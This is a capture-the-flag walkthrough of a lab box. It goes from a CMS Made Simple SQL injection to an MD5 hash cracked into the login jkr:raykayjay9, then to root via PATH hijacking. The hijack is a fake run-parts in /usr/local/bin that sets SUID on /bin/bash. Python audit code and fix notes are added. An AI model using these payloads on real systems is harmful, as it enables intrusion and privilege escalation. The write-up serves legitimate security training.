Writeup

Tools

  • whatweb
  • ffuf
  • pspy
  • hashcat

Nmap

$ sudo nmap -sC -sV -p22,80 10.129.116.95         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-08 18:46 EST
Nmap scan report for 10.129.116.95
Host is up (0.14s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-title: Nothing here yet.
| http-robots.txt: 1 disallowed entry
|_/writeup/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.64 seconds

Foothold

The nmap scan didn't tell me much.

I'm going to use whatweb to get more information:

$ whatweb 10.129.116.95
http://10.129.116.95 [200 OK] Apache[2.4.25], Country[RESERVED][ZZ], Email[jkr@writeup.htb], HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.129.116.95], Title[Nothing here yet.]

From Email[jkr@writeup.htb] I get the domain name, so I'm going to add it to my hosts file:

$ echo '10.129.116.95 writeup.htb' | sudo tee -a /etc/hosts           
10.129.116.95 writeup.htb

The website is just a landing page with some text saying the site is DoS protected. There's nothing else on it or in the page source.

Our nmap scan found the /writeup/ directory via robots.txt. It's a CTF writeup blog, so I'm going to use whatweb on that directory to get more info:

$ whatweb http://writeup.htb/writeup/
http://writeup.htb/writeup/ [200 OK] Apache[2.4.25], CMS-Made-Simple, Cookies[CMSSESSID9d372ef93962], Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.25 (Debian)], IP[10.129.116.95], MetaGenerator[CMS Made Simple - Copyright (C) 2004-2019. All rights reserved.], Title[Home - writeup]

After searching, I found that CMS Made Simple versions <= 2.2.9 are vulnerable to unauthenticated SQL injection. I used this PoC but modified it first: I changed the value of TIME to 5 so the requests don't get blocked by the DoS protection. With it I was able to get the following user credentials:

[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7

I'm going to write hashed_password:salt to a file, which is the input format hashcat expects for this kind of salted hash:

$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash.txt

then crack it with hashcat. Mode 20 is md5($salt.$pass), one MD5 over the salt followed by the password, and the cracked output below confirms that is how the CMS stored it:

$ hashcat -m 20 -a 0 hash.txt /usr/share/wordlists/rockyou.txt           


62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 20 (md5($salt.$pass))
Hash.Target......: 62def4866937f08cc13bab43bb14e6f7:5a599ef579066807
Time.Started.....: Sun Feb 8 20:34:16 2026 (3 secs)
Time.Estimated...: Sun Feb 8 20:34:19 2026 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1767.2 kH/s (0.06ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4360192/14344385 (30.40%)
Rejected.........: 0/4360192 (0.00%)
Restore.Point....: 4359168/14344385 (30.39%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: raymie0506 -> raygan96
Hardware.Mon.#1..: Util: 52%

Started: Sun Feb 8 20:34:07 2026
Stopped: Sun Feb 8 20:34:20 2026
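As an added check that is not part of the original writeup, the following Python recomputes hashcat's mode 20 construction from the hash:salt:plain line printed above and shows which single-round MD5 layout it matches. The two string constants are copied from this page; nothing else is assumed.

```python
import hashlib
import hmac

# Constructed from this page: the hash:salt line fed to hashcat -m 20 and
# the hash:salt:plain line hashcat printed when it cracked it.
HASH_FILE_LINE = "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807"
CRACKED_LINE = "62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9"


def md5_salt_pass(salt: str, password: str) -> str:
    """hashcat mode 20, md5($salt.$pass): one MD5 over salt followed by password."""
    return hashlib.md5((salt + password).encode()).hexdigest()


def parse_cracked_line(line: str):
    """Split hashcat's 'hash:salt:plain' output line into its three parts.
    maxsplit=2 keeps any ':' that happens to be inside the plaintext."""
    digest, salt, plain = line.strip().split(":", 2)
    return digest.lower(), salt, plain


def verify_cracked(line: str) -> bool:
    """Recompute the mode-20 digest for the line and compare in constant time."""
    digest, salt, plain = parse_cracked_line(line)
    return hmac.compare_digest(md5_salt_pass(salt, plain), digest)


def which_construction(line: str) -> str:
    """Report which common single-round MD5 layout matches the cracked line,
    i.e. the question hashcat's -m flag answers."""
    digest, salt, plain = parse_cracked_line(line)
    candidates = {
        "md5($pass)": hashlib.md5(plain.encode()).hexdigest(),
        "md5($salt.$pass)": md5_salt_pass(salt, plain),
        "md5($pass.$salt)": hashlib.md5((plain + salt).encode()).hexdigest(),
    }
    for name, value in candidates.items():
        if hmac.compare_digest(value, digest):
            return name
    return "unknown"
```

A single unsalted-style MD5 round with a 16-character salt costs one hash per guess, which is why a rockyou run finished in the 3 seconds shown above; a slow, memory-hard password hash is the fix on the application side.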

I can now ssh in with the credentials jkr:raykayjay9 and get the user flag.

Privilege Escalation

I found that jkr is in the staff group:

$ id || (whoami && groups) 2>/dev/null
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)

and the staff group has write and execute permissions on /usr/local/bin (and /usr/local/sbin), and /usr/local/bin is the first entry in PATH:

$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

$ ls -ld /usr/local/*
drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin
drwxrwsr-x 2 root staff 4096 Apr 19 2019 /usr/local/etc
drwxrwsr-x 2 root staff 4096 Apr 19 2019 /usr/local/games
drwxrwsr-x 2 root staff 4096 Apr 19 2019 /usr/local/include
drwxrwsr-x 4 root staff 4096 Apr 24 2019 /usr/local/lib
lrwxrwxrwx 1 root staff 9 Apr 19 2019 /usr/local/man -> share/man
drwx-wsr-x 2 root staff 12288 Apr 19 2019 /usr/local/sbin
drwxrwsr-x 8 root staff 4096 Aug 6 2021 /usr/local/share
drwxrwsr-x 2 root staff 4096 Feb 8 20:48 /usr/local/src

which means I can escalate my privileges via binary (PATH) hijacking, provided I can find something root runs by bare name with a PATH that searches /usr/local/bin first.

I uploaded pspy32 to the target machine:

$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32
$ scp pspy32 jkr@writeup.htb:/tmp

then ran the tool in one shell and, in another shell, ssh'd into the machine again:

jkr@writeup:~$ cd /tmp 
jkr@writeup:/tmp/$ chmod +x pspy32
jkr@writeup:/tmp/$ ./pspy32

--SNIP--
2026/02/08 23:06:12 CMD: UID=0 PID=9204 | sshd: [accepted]
2026/02/08 23:06:12 CMD: UID=0 PID=9205 | sshd: [accepted]
2026/02/08 23:07:01 CMD: UID=0 PID=9206 | /usr/sbin/CRON
2026/02/08 23:07:01 CMD: UID=0 PID=9207 | /usr/sbin/CRON
2026/02/08 23:07:01 CMD: UID=0 PID=9208 | /bin/sh -c /root/bin/cleanup.pl >/dev/null 2>&1
2026/02/08 23:07:14 CMD: UID=0 PID=9209 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2026/02/08 23:07:14 CMD: UID=0 PID=9210 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2026/02/08 23:07:14 CMD: UID=0 PID=9211 | run-parts --lsbsysinit /etc/update-motd.d
2026/02/08 23:07:14 CMD: UID=0 PID=9212 | uname -rnsom
2026/02/08 23:07:14 CMD: UID=0 PID=9213 | sshd: jkr [priv]
--SNIP--

When I ssh into the machine, root launches sh to run /usr/bin/env -i, which runs a command with a modified environment: -i starts from an empty environment, and the command line then sets PATH to /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin before running run-parts --lsbsysinit /etc/update-motd.d to build the MOTD. run-parts is given by bare name, so it is resolved through that PATH, and /usr/local/sbin and /usr/local/bin are searched before the system directories that hold the real run-parts.
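The misconfiguration behind this, as an added audit example that is not part of the original writeup: parse an `ls -ld` listing like the one earlier and report which entries of the root job's PATH a given user could write to, plus a live check of the current user's own PATH. The /usr/bin line in the sample listing is an assumed, constructed entry added for contrast; the other lines and the PATH value are copied from this page.

```python
import os
import re
from typing import Dict, List, Tuple

# Sample listing constructed from this page's `ls -ld /usr/local/*` output,
# plus one assumed root-owned /usr/bin line for contrast.
LS_OUTPUT = """\
drwx-wsr-x 2 root staff 20480 Apr 19 2019 /usr/local/bin
drwxrwsr-x 2 root staff 4096 Apr 19 2019 /usr/local/etc
lrwxrwxrwx 1 root staff 9 Apr 19 2019 /usr/local/man -> share/man
drwx-wsr-x 2 root staff 12288 Apr 19 2019 /usr/local/sbin
drwxr-xr-x 2 root root 4096 Apr 19 2019 /usr/bin
"""
# PATH that env -i set for run-parts in the pspy capture on this page.
ROOT_JOB_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

LS_RE = re.compile(r"^([dl-])([rwxsSt-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+\d+"
                   r"\s+\S+\s+\S+\s+\S+\s+(\S+)")


def parse_ls(ls_text: str) -> Dict[str, Tuple[str, str, str]]:
    """Map each listed path to (permission bits, owner, group)."""
    entries = {}
    for line in ls_text.splitlines():
        m = LS_RE.match(line)
        if m:
            _kind, mode, owner, group, path = m.groups()
            entries[path] = (mode, owner, group)
    return entries


def hijackable_dirs(path_var: str, entries, user: str, groups: List[str]) -> List[str]:
    """PATH entries, in search order, that `user` can write to. Any command a
    root job resolves by bare name can be shadowed from the first such entry."""
    found = []
    for d in path_var.split(":"):
        if d not in entries:
            continue                       # not in the listing: cannot assess
        mode, owner, group = entries[d]
        owner_w = mode[1] == "w" and owner == user
        group_w = mode[4] == "w" and group in groups
        other_w = mode[7] == "w"
        if owner_w or group_w or other_w:
            found.append(d)
    return found


def live_path_audit() -> List[str]:
    """Same check against the running system, as the current user."""
    return [d for d in os.environ.get("PATH", "").split(":")
            if os.path.isdir(d) and os.access(d, os.W_OK)]
```

The fix is to drop group write on /usr/local/bin and /usr/local/sbin (or remove the user from staff) and to invoke run-parts by absolute path in root-run jobs so PATH lookup never happens.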

So, with that, I can create a malicious run-parts file in /usr/local/bin, which will be executed as root when I ssh into the machine.

I create an executable payload that sets the SUID bit on the /bin/bash binary:

$ echo -e '#!/bin/bash\n\nchmod u+s /bin/bash' > /usr/local/bin/run-parts
$ chmod +x /usr/local/bin/run-parts

Now all I have to do is ssh into the machine again; the payload triggers, bash becomes a SUID binary, and running it with the -p flag (which keeps the effective uid instead of dropping it) gives me root:

$ ssh jkr@writeup.htb

-bash-4.4$ whoami
jkr
-bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4#